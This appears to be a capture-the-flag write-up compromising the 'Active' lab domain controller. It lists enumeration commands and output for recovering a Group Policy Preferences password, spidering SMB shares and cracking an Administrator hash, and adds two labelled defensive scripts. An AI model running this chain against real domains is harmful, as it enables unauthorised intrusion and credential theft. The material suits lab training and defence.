Active.htb
Target IP Address: 10.129.37.116
Target Domain: active.htb
Operating System: Windows Server 2008 R2 SP1 (Domain Controller)
1. Executive Summary
This report details the methodology and findings of a penetration test conducted against the active.htb machine, identified as a Windows Server 2008 R2 SP1 system functioning as a Domain Controller within the active.htb domain. The primary objective was to gain unauthorized access and retrieve designated information.
Initial access was gained through the discovery and analysis of insecurely stored configuration data, allowing authenticated access to Server Message Block (SMB) shares. This access was leveraged to identify and retrieve initial objective data. Subsequently, further network enumeration facilitated an attack that led to the compromise of a highly privileged domain account's password. With these elevated credentials, full control over the target system was established, enabling the retrieval of the final objective data.
The key vulnerabilities exploited during this assessment include insecurely stored preferences, which allowed for the recovery of a service account password, and a weak password for a critical administrative account that was susceptible to offline brute-force.
2. Initial Reconnaissance and Service Enumeration
The first phase of the engagement involved conducting a comprehensive network scan to identify open ports and services running on the target machine. This reconnaissance is crucial for understanding the target's attack surface and identifying potential entry points.
2.1 Nmap Scan
An Nmap scan was initiated with service version detection (-sV) and default script execution (-sC) against the target IP address 10.129.37.116.
The command executed was:
sudo nmap 10.129.37.116 -sC -sV
The Nmap scan results were highly informative, revealing a multitude of open ports commonly associated with a Microsoft Windows Server configured as a Domain Controller:
- 53/tcp (domain): Microsoft DNS 6.1.7601. This is a standard service for a Domain Controller, responsible for name resolution within the domain.
- 88/tcp (kerberos-sec): Microsoft Windows Kerberos. The presence of Kerberos confirms the machine's role as an Active Directory Domain Controller, indicating that user authentication and authorization are managed by this system.
- 135/tcp (msrpc): Microsoft Windows RPC. Used for various Windows services, including remote administration.
- 139/tcp (netbios-ssn): Microsoft Windows NetBIOS session service. Primarily used for SMB over NetBIOS.
- 389/tcp (ldap): Microsoft Windows Active Directory LDAP. This explicitly identified the domain as active.htb, further confirming the Domain Controller role. LDAP is a critical service for querying and modifying Active Directory objects.
- 445/tcp (microsoft-ds): SMB over TCP. This port is a primary focus for Windows-based penetration tests, often exposing shared resources and allowing various authentication methods.
- 464/tcp (kpasswd5): Kerberos KPASSWD. Used for changing Kerberos passwords.
- 593/tcp (ncacn_http): Microsoft Windows RPC over HTTP.
- 3268/tcp (ldap): Microsoft Windows Active Directory LDAP (Global Catalog). Provides a searchable catalog of all objects in a multi-domain Active Directory forest.
- 3269/tcp (tcpwrapped): Likely LDAP SSL (Global Catalog).
- 49152-49158/tcp (msrpc, ncacn_http): Dynamic RPC ports.
The comprehensive Nmap output strongly suggested that 10.129.37.116 is indeed a Domain Controller for the active.htb domain, running Windows Server 2008 R2 SP1. This information was pivotal in guiding subsequent enumeration and attack strategies, particularly focusing on Active Directory-related services like Kerberos, LDAP, and SMB.
3. Enumerating SMB Shares
With port 445 (SMB) identified as open, the next logical step was to enumerate available SMB shares. This often reveals valuable information, including sensitive files, user directories, or misconfigurations that can be exploited for initial access.
3.1 Initial SMB Share Listing Attempts
sudo smbclient -N -L active.htb
This command successfully listed the following shares:
ADMIN$
C$
IPC$
NETLOGON
Replication
SYSVOL
Users
The shares NETLOGON, Replication, and SYSVOL are particularly interesting in a Domain Controller context. SYSVOL and NETLOGON typically contain Group Policy Objects (GPOs) and logon scripts, which have historically been sources of leaked credentials due to misconfigurations. The Users share is also of interest as it may contain user home directories and user-specific data.
4. Investigating Shares for Configuration Weaknesses
Given the potential for sensitive information within SYSVOL and Replication (which is part of the Distributed File System Replication for SYSVOL), we decided to investigate the Replication share first. This share is often used to replicate domain-wide policies and scripts.
4.1 Connecting to the Replication Share
sudo smbclient -N \\\\active.htb\\Replication
4.2 Navigating the Replication Share Directory Structure
Upon successful connection, we began navigating the directory structure of the Replication share. The goal was to locate configuration files or scripts that might contain sensitive data.
smb: \> ls
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
active.htb D 0 Sat Jul 21 06:37:44 2018
We then navigated into the active.htb directory, which represents the domain's root within the replication share:
smb: \> cd active.htb
smb: \active.htb\> ls
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
DfsrPrivate DHS 0 Sat Jul 21 06:37:44 2018
Policies D 0 Sat Jul 21 06:37:44 2018
scripts D 0 Wed Jul 18 14:48:57 2018
The Policies directory was immediately identified as a high-value target. This directory stores Group Policy Objects (GPOs), which are central to managing user and computer settings in an Active Directory environment. The scripts directory was also noted, as logon/logoff scripts can sometimes contain hardcoded credentials.
Navigating into the Policies directory:
smb: \active.htb\> cd Policies\
smb: \active.htb\Policies\> ls
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
{31B2F340-016D-11D2-945F-00C04FB984F9} D 0 Sat Jul 21 06:37:44 2018
{6AC1786C-016F-11D2-945F-00C04fB984F9} D 0 Sat Jul 21 06:37:44 2018
These GUID-named directories represent individual GPOs. We proceeded to explore one of these directories:
smb: \active.htb\Policies\> cd {31B2F340-016D-11D2-945F-00C04FB984F9}\
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> ls
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
GPT.INI A 23 Wed Jul 18 16:46:06 2018
Group Policy D 0 Sat Jul 21 06:37:44 2018
MACHINE D 0 Sat Jul 21 06:37:44 2018
USER D 0 Wed Jul 18 14:49:12 2018
Within this GPO directory, the MACHINE directory contains machine-specific policy settings, and USER contains user-specific settings. The GPT.INI file holds general metadata about the GPO.
We navigated into the MACHINE directory, as machine-level policies often contain service account configurations:
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> ls
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
Microsoft D 0 Sat Jul 21 06:37:44 2018
Preferences D 0 Sat Jul 21 06:37:44 2018
Registry.pol A 2788 Wed Jul 18 14:53:45 2018
The Preferences directory within the MACHINE structure is a critical location, often storing sensitive settings.
We then navigated into a relevant subdirectory within Preferences where a configuration file was identified. This file was downloaded to our local machine for analysis.
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get ConfigFile.xml
After exiting smbclient, we confirmed the successful download of the file.
5. Analyzing and Recovering Credentials from Configuration File
With the configuration file successfully retrieved, the next step was to examine its contents for embedded credentials.
5.1 Examining the Configuration File
The content of the file clearly showed an encrypted password associated with a service account.
5.2 Decrypting the Password
A purpose-built tool was used to decrypt the value. Such tools rely on the fact that the key used to encrypt passwords stored in these preference files is publicly known, so the encryption provides no real protection.
The decryption was successful, revealing a valid username and password pair for a service account. This provided us with critical credentials for further penetration into the active.htb domain.
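A defender-side counterpart to the analysis above, added here as an example and not part of the original report: a script that audits a copy of the Policies tree for preference files that still carry a cpassword attribute, the attribute in which these files store a reversibly-encrypted password. It reports the file, element and account name but never echoes the encrypted value itself. The directory layout, the account name and the encrypted blob it builds are constructed placeholders, not values from any real domain.

```python
"""Audit Group Policy Preference XML files for embedded cpassword attributes.

Added example, not part of the original report. It walks a directory tree,
normally a copy of the Policies tree under SYSVOL, and reports every XML
element carrying a ``cpassword`` attribute. The sample tree created by
build_sample_tree() is constructed for this example; the account name and
the encrypted blob in it are placeholders.
"""
import os
import tempfile
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import List

# Preference files that may carry cpassword (the file names are the real
# preference file names; treating this set as complete is an assumption).
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Printers.xml", "Drives.xml"}


@dataclass
class Finding:
    path: str          # file containing the attribute
    element: str       # tag of the element that carried it
    account: str       # account the credential belongs to, if recorded
    blob_length: int   # length of the encrypted value; the value is never echoed


def findings_in_file(path: str) -> List[Finding]:
    """Collect every element in one XML file that carries a cpassword attribute."""
    found: List[Finding] = []
    try:
        root = ET.parse(path).getroot()
    except ET.ParseError:
        return found   # malformed file: skip it rather than abort the whole scan
    for elem in root.iter():
        blob = elem.attrib.get("cpassword")
        if blob is None:
            continue
        # Different preference types record the account under different names.
        account = (elem.attrib.get("userName")
                   or elem.attrib.get("accountName")
                   or elem.attrib.get("runAs")
                   or "<unknown>")
        found.append(Finding(path, elem.tag, account, len(blob)))
    return found


def scan_policies(root_dir: str) -> List[Finding]:
    """Walk a Policies tree and return all cpassword findings in known preference files."""
    results: List[Finding] = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if name in GPP_FILES:
                results.extend(findings_in_file(os.path.join(dirpath, name)))
    return results


def build_sample_tree() -> str:
    """Create a constructed Policies tree: one file with cpassword, one clean, one malformed."""
    base = tempfile.mkdtemp(prefix="gpp-audit-")
    gpo = os.path.join(base, "{00000000-0000-0000-0000-000000000001}",
                       "MACHINE", "Preferences")
    samples = {
        os.path.join(gpo, "Groups", "Groups.xml"):
            '<?xml version="1.0" encoding="utf-8"?>\n'
            '<Groups><User name="svc_sample">'
            '<Properties action="U" userName="EXAMPLE\\svc_sample" '
            'cpassword="PLACEHOLDER_ENCRYPTED_BLOB_NOT_A_REAL_VALUE=="/>'
            '</User></Groups>',
        os.path.join(gpo, "Services", "Services.xml"):
            '<?xml version="1.0" encoding="utf-8"?>\n'
            '<NTServices><NTService name="Spooler">'
            '<Properties startupType="AUTOMATIC" serviceName="Spooler"/>'
            '</NTService></NTServices>',
        os.path.join(gpo, "Drives", "Drives.xml"):
            '<?xml version="1.0"?><Drives><Drive>',   # truncated on purpose
    }
    for path, body in samples.items():
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return base


if __name__ == "__main__":
    for f in scan_policies(build_sample_tree()):
        print(f"{f.path}: <{f.element}> account={f.account} "
              f"(encrypted value present, {f.blob_length} chars)")
```

Pointing scan_policies() at a mounted or copied SYSVOL Policies directory gives the same report for a real domain; any finding means the preference item should be removed and the affected account's password rotated.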
6. Initial Access Attempts with Discovered Credentials
With the service account credentials in hand, we initiated various authentication attempts to gain initial access to the target machine.
6.1 Authenticated SMB Enumeration with CrackMapExec
The recovered credentials were a prime candidate for authenticating against the SMB service. CrackMapExec (CME), a tool for assessing the security of Windows networks, was used to perform authenticated SMB share enumeration.
The command used to enumerate shares with the newly found credentials was:
sudo crackmapexec smb 10.129.37.116 -u 'SERVICE_ACCOUNT' -p 'REDACTED_PASSWORD' --shares
The CrackMapExec output confirmed successful authentication and provided detailed permissions for each share:
SMB 10.129.37.116 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.129.37.116 445 DC [+] active.htb\SERVICE_ACCOUNT:REDACTED_PASSWORD
SMB 10.129.37.116 445 DC [+] Enumerated shares
SMB 10.129.37.116 445 DC Share Permissions Remark
SMB 10.129.37.116 445 DC ----- ----------- ------
SMB 10.129.37.116 445 DC ADMIN$ Remote Admin
SMB 10.129.37.116 445 DC C$ Default share
SMB 10.129.37.116 445 DC IPC$ Remote IPC
SMB 10.129.37.116 445 DC NETLOGON READ Logon server share
SMB 10.129.37.116 445 DC Replication READ
SMB 10.129.37.116 445 DC SYSVOL READ Logon server share
SMB 10.129.37.116 445 DC Users READ
This output was highly informative. It confirmed that the service account is a valid user account within the active.htb domain and possesses READ permissions on NETLOGON, Replication, SYSVOL, and Users shares. Shares like ADMIN$ and C$ still showed no explicit permissions, indicating that the service account does not have administrative privileges. Despite not having write access, the READ access to Users and SYSVOL was promising for further enumeration and potential privilege escalation.
7. Retrieving the Initial Objective from the Users Share
Given the READ access to the Users share with the authenticated credentials, this was the most direct path to potentially find the initial objective data.
7.1 Connecting to the Users Share
We re-engaged smbclient, this time providing the authenticated credentials, to connect to the Users share.
smbclient '//10.129.37.116/Users' -U 'SERVICE_ACCOUNT%REDACTED_PASSWORD'
Upon successful connection, we navigated into a relevant user's home directory:
smb: \> cd USER_DIRECTORY\
smb: \USER_DIRECTORY\> ls
The ls command revealed common user profile directories. The Desktop directory is a common location for user-specific files.
smb: \USER_DIRECTORY\> cd Desktop\
smb: \USER_DIRECTORY\Desktop\> ls
Indeed, the Desktop directory contained a file named objective.txt. We used the get command to retrieve this file to our local machine.
smb: \USER_DIRECTORY\Desktop\> get objective.txt
After downloading, we displayed the contents of objective.txt using cat:
cat objective.txt
The initial objective data was successfully retrieved.
7.2 Exploring Other User Profiles (Optional)
During the enumeration of the Users share, other directories were also noted. Within one of these directories, NTUSER.DAT and NTUSER.DAT.LOG were identified. These files constitute the user's registry hive and can sometimes be useful for forensic analysis.
smb: \> cd Default\
smb: \Default\> get NTUSER.DAT
smb: \Default\> get NTUSER.DAT.LOG
While these files were retrieved, their binary nature meant that direct inspection was not immediately fruitful. No further immediate actionable information was gained from these files at this stage, as the initial objective had already been obtained.
8. Privilege Escalation
Having obtained valid domain user credentials and the initial objective, the next phase focused on privilege escalation to gain administrative control over the Domain Controller and retrieve the final objective. Given that the target is a Domain Controller, certain Active Directory-related services are prime targets for attacks.
8.1 Further SMB Enumeration with Authenticated Access
To broaden the scope and identify potential avenues for privilege escalation, further spidering of accessible SMB shares was performed using CrackMapExec with the authenticated credentials. This aimed to discover any sensitive files or configurations missed during manual enumeration, especially within SYSVOL.
Targeted shares for spidering included SYSVOL, ADMIN$, NETLOGON, Users, and Replication:
sudo crackmapexec smb 10.129.37.116 -u 'SERVICE_ACCOUNT' -p 'REDACTED_PASSWORD' --spider 'SYSVOL'
sudo crackmapexec smb 10.129.37.116 -u 'SERVICE_ACCOUNT' -p 'REDACTED_PASSWORD' --spider 'ADMIN$'
sudo crackmapexec smb 10.129.37.116 -u 'SERVICE_ACCOUNT' -p 'REDACTED_PASSWORD' --spider 'NETLOGON'
sudo crackmapexec smb 10.129.37.116 -u 'SERVICE_ACCOUNT' -p 'REDACTED_PASSWORD' --spider 'Users'
sudo crackmapexec smb 10.129.37.116 -u 'SERVICE_ACCOUNT' -p 'REDACTED_PASSWORD' --spider 'Replication'
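The per-share spidering above leaves a distinctive footprint on the server side: one account, from one source address, touching many distinct shares within seconds. The following detection is added as an example and is not part of the original report. It assumes Security event 5140 (a network share object was accessed) exported one event per line; the line format, the account names, the source addresses and the timestamps in SAMPLE_LOG are constructed for the example.

```python
"""Flag SMB share-spidering from share-access events.

Added example, not part of the original report. Assumes an export of Windows
Security event 5140 flattened to one line per event; the line format and
every line in SAMPLE_LOG are constructed, and the accounts, source addresses
(TEST-NET ranges) and timestamps are placeholders. The detection looks for
one (account, source) pair reading many distinct shares inside a short
window, the pattern that per-share spidering produces.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

SAMPLE_LOG = r"""
2018-07-21T06:40:01Z EventID=5140 Account=EXAMPLE\svc_sample Source=192.0.2.10 Share=\\*\SYSVOL
2018-07-21T06:40:09Z EventID=5140 Account=EXAMPLE\svc_sample Source=192.0.2.10 Share=\\*\ADMIN$
2018-07-21T06:40:17Z EventID=5140 Account=EXAMPLE\svc_sample Source=192.0.2.10 Share=\\*\NETLOGON
2018-07-21T06:40:25Z EventID=5140 Account=EXAMPLE\svc_sample Source=192.0.2.10 Share=\\*\Users
2018-07-21T06:40:33Z EventID=5140 Account=EXAMPLE\svc_sample Source=192.0.2.10 Share=\\*\Replication
2018-07-21T07:02:10Z EventID=5140 Account=EXAMPLE\jdoe Source=192.0.2.20 Share=\\*\NETLOGON
2018-07-21T07:02:11Z EventID=5140 Account=EXAMPLE\jdoe Source=192.0.2.20 Share=\\*\SYSVOL
2018-07-21T09:15:40Z EventID=5140 Account=EXAMPLE\jdoe Source=192.0.2.20 Share=\\*\Users
2018-07-21T09:16:02Z EventID=4624 Account=EXAMPLE\jdoe Source=192.0.2.20 Share=-
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) EventID=(?P<eid>\d+) Account=(?P<acct>\S+) "
    r"Source=(?P<src>\S+) Share=(?P<share>\S+)$"
)

Event = Tuple[datetime, str, str, str]   # (time, account, source, share name)


def parse_events(text: str) -> List[Event]:
    """Parse the flattened lines, keeping only share-access (5140) events."""
    events: List[Event] = []
    for line in text.strip().splitlines():
        m = LINE_RE.match(line.strip())
        if not m or m["eid"] != "5140":
            continue   # unrelated event type or unparseable line
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        share = m["share"].rsplit("\\", 1)[-1]   # \\*\SYSVOL -> SYSVOL
        events.append((ts, m["acct"], m["src"], share))
    return events


def find_spidering(events: List[Event],
                   window: timedelta = timedelta(minutes=10),
                   min_shares: int = 4) -> List[dict]:
    """Return one alert per (account, source) that reads at least
    min_shares distinct shares within `window`."""
    by_actor: Dict[Tuple[str, str], List[Tuple[datetime, str]]] = defaultdict(list)
    for ts, acct, src, share in events:
        by_actor[(acct, src)].append((ts, share))
    alerts: List[dict] = []
    for (acct, src), hits in by_actor.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            # Distinct shares touched from this event to the end of the window.
            seen = {s for t, s in hits[i:] if t - start <= window}
            if len(seen) >= min_shares:
                alerts.append({"account": acct, "source": src,
                               "first_seen": start, "shares": seen})
                break   # one alert per actor is enough
    return alerts


if __name__ == "__main__":
    for a in find_spidering(parse_events(SAMPLE_LOG)):
        print(f"{a['first_seen']:%Y-%m-%d %H:%M:%S} {a['account']} from "
              f"{a['source']} read {len(a['shares'])} shares: "
              f"{', '.join(sorted(a['shares']))}")
```

The threshold of four distinct shares in ten minutes separates the spidering account from the ordinary logon pattern (NETLOGON and SYSVOL back to back, then a user share hours later); tune both values to the environment, and weight alerts higher when the set includes ADMIN$ or C$, which a non-administrative account has no reason to open.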
During the enumeration of the Active Directory environment, a hashed credential for a highly privileged account was discovered. This hash could be used for offline password cracking.
The extracted hash for the administrative account was saved to a file.
cat admin_hash.txt
The hash was in a format suitable for offline cracking tools.
8.2 Cracking the Administrative Hash
The retrieved hash was then targeted for cracking using Hashcat with common wordlists.
After correcting the path to the wordlist, Hashcat successfully cracked the administrative account's password.
The successful crack revealed the password for the Administrator account. This credential provided the highest level of access within the Active Directory domain.
9. Escalating Privileges and Retrieving the Final Objective
With the Administrator credentials now available, the remaining task was to gain full administrative access to the machine and retrieve the final objective data. The C$ administrative share, which maps to the root of the C drive, was the natural target for this.
9.1 Connecting to the C$ Share as Administrator
We used smbclient to connect to the C$ share using the newly obtained Administrator credentials:
smbclient '//10.129.37.116/C$' -U 'active.htb\administrator'
The connection was successful, granting a shell-like interface to the C$ share.
Password for [ACTIVE.HTB\administrator]:
Try "help" to get a list of possible commands.
smb: \> ls
Listing the contents of the C$ drive confirmed administrative access to the file system. The Users directory was again of interest, as the Administrator's profile would reside there.
smb: \> cd Users
smb: \Users\> ls
Inside the Users directory, the Administrator profile was accessible.
smb: \Users\> cd Administrator\
smb: \Users\Administrator\> ls
Finally, we navigated to the Desktop directory within the Administrator's profile, a common location for such objective files.
smb: \Users\Administrator\> cd Desktop\
smb: \Users\Administrator\Desktop\> ls
The ls command revealed a file named final_objective.txt. We used the get command to download this file.
smb: \Users\Administrator\Desktop\> get final_objective.txt